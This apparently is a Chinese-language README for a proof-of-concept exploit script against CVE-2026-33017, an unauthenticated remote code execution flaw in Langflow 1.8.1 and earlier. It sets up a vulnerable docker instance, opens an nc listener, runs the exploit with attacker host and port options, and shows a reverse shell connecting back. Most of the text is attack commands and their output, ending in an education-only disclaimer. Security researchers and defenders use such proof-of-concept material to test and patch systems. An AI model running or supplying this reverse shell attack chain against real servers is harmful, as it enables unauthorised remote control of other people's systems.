Langflow <= 1.8.1 存在一个远程、未认证的 RCE 漏洞(https://nvd.nist.gov/vuln/detail/CVE-2026-33017)
usage: CVE-2026-33017.py [-h] --lhost LHOST --lport LPORT target
PoC exploit: CVE-2026-33017
positional arguments:
target Target hostname
options:
-h, --help show this help message and exit
--lhost LHOST Reverse shell destination IP address
--lport LPORT Reverse shell destination port
# 创建 docker 实例
docker run -d -p 7860:7860 langflowai/langflow:1.8.1
# 启动监听器
nc -lnvp 4444
# 启动漏洞利用
python3 CVE-2026-33017.py 127.0.0.1 --lhost 192.168.1.17 --lport 4444
# 应在监听器中收到反弹 shell
Listening on 0.0.0.0 4444
Connection received on 172.17.0.2 42712
uname -a
Linux 9be89ace430c 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64 GNU/Linux
本项目仅供教育和研究目的使用。 作者不对因使用此代码造成的滥用或损害负责。